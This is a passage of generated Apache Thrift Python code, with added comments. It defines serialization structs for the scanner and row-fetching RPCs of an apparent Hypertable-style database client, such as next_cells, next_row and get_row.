    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    # success: list of Cell structs; e: ClientException on failure.
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Read list<Cell>: element count from readListBegin, then one
          # Cell struct per element.
          self.success = []
          (_etype49, _size46) = iprot.readListBegin()
          for _i50 in xrange(_size46):
            _elem51 = Cell()
            _elem51.read(iprot)
            self.success.append(_elem51)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_cells_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter52 in self.success:
        iter52.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_cells_as_arrays_args:
  """
  Argument struct for the next_cells_as_arrays() RPC.

  Attributes:
   - scanner
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'scanner', None, None, ), # 1
  )

  def __init__(self, scanner=None,):
    # scanner: i64 scanner handle (per thrift_spec).
    self.scanner = scanner

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.scanner = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_cells_as_arrays_args')
    if self.scanner != None:
      oprot.writeFieldBegin('scanner', TType.I64, 1)
      oprot.writeI64(self.scanner)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_cells_as_arrays_result:
  """
  Result struct for the next_cells_as_arrays() RPC: a list of
  string lists (one inner list per cell).

  Attributes:
   - success
   - e
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    # success: list of list of strings; e: ClientException on failure.
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Read list<list<string>>: nested readListBegin/readListEnd pairs.
          self.success = []
          (_etype56, _size53) = iprot.readListBegin()
          for _i57 in xrange(_size53):
            _elem58 = []
            (_etype62, _size59) = iprot.readListBegin()
            for _i63 in xrange(_size59):
              _elem64 = iprot.readString();
              _elem58.append(_elem64)
            iprot.readListEnd()
            self.success.append(_elem58)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_cells_as_arrays_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.LIST, len(self.success))
      for iter65 in self.success:
        oprot.writeListBegin(TType.STRING, len(iter65))
        for iter66 in iter65:
          oprot.writeString(iter66)
        oprot.writeListEnd()
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_cells_serialized_args:
  """
  Argument struct for the next_cells_serialized() RPC.

  Attributes:
   - scanner
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'scanner', None, None, ), # 1
  )

  def __init__(self, scanner=None,):
    # scanner: i64 scanner handle (per thrift_spec).
    self.scanner = scanner

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.scanner = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_cells_serialized_args')
    if self.scanner != None:
      oprot.writeFieldBegin('scanner', TType.I64, 1)
      oprot.writeI64(self.scanner)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_cells_serialized_result:
  """
  Result struct for the next_cells_serialized() RPC: an opaque
  serialized string of cells.  NOTE(review): unlike the sibling
  result structs, this one declares no exception field 'e' -- this
  matches its thrift_spec, presumably mirroring the IDL.

  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
  )

  def __init__(self, success=None,):
    # success: serialized cell data as a string.
    self.success = success

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_cells_serialized_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_row_args:
  """
  Argument struct for the next_row() RPC.

  Attributes:
   - scanner
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'scanner', None, None, ), # 1
  )

  def __init__(self, scanner=None,):
    # scanner: i64 scanner handle (per thrift_spec).
    self.scanner = scanner

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.scanner = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_row_args')
    if self.scanner != None:
      oprot.writeFieldBegin('scanner', TType.I64, 1)
      oprot.writeI64(self.scanner)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_row_result:
  """
  Result struct for the next_row() RPC: a list of Cell structs.

  Attributes:
   - success
   - e
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    # success: list of Cell structs; e: ClientException on failure.
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Read list<Cell>: element count from readListBegin, then one
          # Cell struct per element.
          self.success = []
          (_etype70, _size67) = iprot.readListBegin()
          for _i71 in xrange(_size67):
            _elem72 = Cell()
            _elem72.read(iprot)
            self.success.append(_elem72)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_row_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter73 in self.success:
        iter73.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_row_as_arrays_args:
  """
  Argument struct for the next_row_as_arrays() RPC.

  Attributes:
   - scanner
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'scanner', None, None, ), # 1
  )

  def __init__(self, scanner=None,):
    # scanner: i64 scanner handle (per thrift_spec).
    self.scanner = scanner

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.scanner = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_row_as_arrays_args')
    if self.scanner != None:
      oprot.writeFieldBegin('scanner', TType.I64, 1)
      oprot.writeI64(self.scanner)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_row_as_arrays_result:
  """
  Result struct for the next_row_as_arrays() RPC: a list of
  string lists (one inner list per cell).

  Attributes:
   - success
   - e
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    # success: list of list of strings; e: ClientException on failure.
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Read list<list<string>>: nested readListBegin/readListEnd pairs.
          self.success = []
          (_etype77, _size74) = iprot.readListBegin()
          for _i78 in xrange(_size74):
            _elem79 = []
            (_etype83, _size80) = iprot.readListBegin()
            for _i84 in xrange(_size80):
              _elem85 = iprot.readString();
              _elem79.append(_elem85)
            iprot.readListEnd()
            self.success.append(_elem79)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_row_as_arrays_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.LIST, len(self.success))
      for iter86 in self.success:
        oprot.writeListBegin(TType.STRING, len(iter86))
        for iter87 in iter86:
          oprot.writeString(iter87)
        oprot.writeListEnd()
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_row_serialized_args:
  """
  Argument struct for the next_row_serialized() RPC.

  Attributes:
   - scanner
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'scanner', None, None, ), # 1
  )

  def __init__(self, scanner=None,):
    # scanner: i64 scanner handle (per thrift_spec).
    self.scanner = scanner

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.scanner = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_row_serialized_args')
    if self.scanner != None:
      oprot.writeFieldBegin('scanner', TType.I64, 1)
      oprot.writeI64(self.scanner)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class next_row_serialized_result:
  """
  Result struct for the next_row_serialized() RPC: an opaque
  serialized string of cells, plus an optional exception.

  Attributes:
   - success
   - e
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    # success: serialized cell data as a string; e: ClientException on failure.
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('next_row_serialized_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_row_args:
  """
  Argument struct for the get_row() RPC.

  Attributes:
   - ns
   - table_name
   - row
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRING, 'row', None, None, ), # 3
  )

  def __init__(self, ns=None, table_name=None, row=None,):
    # ns: i64 namespace handle; table_name/row: strings (per thrift_spec).
    self.ns = ns
    self.table_name = table_name
    self.row = row

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.row = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_row_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name != None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.row != None:
      oprot.writeFieldBegin('row', TType.STRING, 3)
      oprot.writeString(self.row)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_row_result:
  """
  Result struct for the get_row() RPC: a list of Cell structs.

  Attributes:
   - success
   - e
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    # success: list of Cell structs; e: ClientException on failure.
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Read list<Cell>: element count from readListBegin, then one
          # Cell struct per element.
          self.success = []
          (_etype91, _size88) = iprot.readListBegin()
          for _i92 in xrange(_size88):
            _elem93 = Cell()
            _elem93.read(iprot)
            self.success.append(_elem93)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_row_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter94 in self.success:
        iter94.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
